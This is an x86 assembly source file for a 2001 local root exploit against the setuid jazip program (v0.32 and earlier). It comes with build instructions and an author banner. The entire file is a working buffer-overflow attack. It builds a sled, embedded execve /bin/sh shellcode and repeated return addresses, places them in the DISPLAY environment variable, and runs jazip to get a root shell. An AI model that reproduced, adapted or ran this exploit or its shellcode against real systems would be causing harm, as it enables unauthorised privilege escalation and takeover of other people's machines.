; -   q u i c k .  a n d  .  d i r t y ! @ * $  -
;    _         _                    _     _ _
;   |_|___ ___|_|___    ___ _ _ ___| |___|_| |_
;   | | .'|- _| | . |  | -_|_'_| . | | . | |  _|
;  _| |__,|___|_|  _|  |___|_,_|  _|_|___|_|_|
; |___|         |_|            |_|
; 
;    Created date    : 2001-09-05
;    Author          : teleh0r
;    Description     : simple buffer overflow exploit.
;                    
;  compile with: nasm -f elf jazip-exploit.asm -o x.o
;  gcc x.o -o jazip-exploit
;
; written due to serious bored0m - since I am leaving
; digit-labs I would like to wish all the members
; good luck in the future.

%define buf_size  0x837
%define nop_len   0x7bb
%define dec_ebx   0x4b
%define ret_len   0x64

segment .text
;;;;;;;;;;;;;

; libc functions doing da work.

extern puts
extern printf
extern memset
extern memcpy
extern setenv
extern strcat
extern system


	global main	
main:
	; prolog - setting up stack frame

	push ebp
	mov  ebp, esp
	push ebx
	push esi
	push edi

	; printing header and info

	push dword msg1
	call puts
	add  esp, 0x04

	push dword msg2
        call puts
        add  esp, 0x04

	push dword sc_len
	push dword msg3
	call printf
	add  esp, 0x04
	
	; adding nops

	push dword buf_size-sc_len-ret_len
	push dword dec_ebx
	push dword buffer
	call memset 
	add  esp, 0x0c	

	; adding the shellcode

	push dword 0x18
	push dword shellcode
	push dword buffer
	pop  eax
	add  eax, buf_size-sc_len-ret_len
	push eax
	call memcpy
	add  esp, 0x0c

	; adding the return'z

	mov edi, 0x19

	fun_loop:

	push dword s_eip
	push dword buffer
	call strcat 
	add  esp, 8
	dec  edi

	jnz  fun_loop
	
	; placing buffer in env

        push dword 0x01
        push dword buffer
        push dword env
        call setenv
        add  esp, 0x0c

	; execute jazip

	push dword path
        call system
	
	; tear it all down

	leave
	ret

segment .data
;;;;;;;;;;;;;

msg1 db "1ocal root exploit for jazip v.0.32 and prior",  0x00
msg2 db "copyright (c) 2001 by <teleh0r@digit-labs.org>", 0x0a,0x00
msg3 db "shellcode length: %i", 0x0a, 0x00

env   db "DISPLAY", 0x00
path  db "/usr/X11R6/bin/jazip", 0x00
s_eip db 0xe8, 0xf9, 0xff, 0xbf, 0x00
	
; 24 bytes PIC execve shellcode by myself

shellcode db 0x31,0xc0,0x99,0x52,0x68,0x2f,0x2f,
          db 0x73,0x68,0x68,0x2f,0x62,0x69,0x6e,
          db 0x89,0xe3,0x52,0x53,0x89,0xe1,0xb0,
          db 0x0b,0xcd,0x80,0x00

sc_len equ $ - shellcode - 1

segment .bss
;;;;;;;;;;;;

buffer resb buf_size